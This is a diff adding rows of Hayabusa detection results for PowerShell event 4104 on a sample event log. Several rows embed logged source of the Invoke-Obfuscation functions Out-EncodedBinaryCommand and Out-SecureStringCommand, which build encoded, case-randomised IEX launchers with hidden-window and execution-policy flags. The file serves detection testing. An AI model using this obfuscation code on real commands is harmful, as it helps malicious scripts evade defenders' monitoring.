+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r<mOa&') | ForEach-Object{ ( [Convert]::ToInt16(( [String]$_ ) , 2 ) -As[Char]) } )) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required 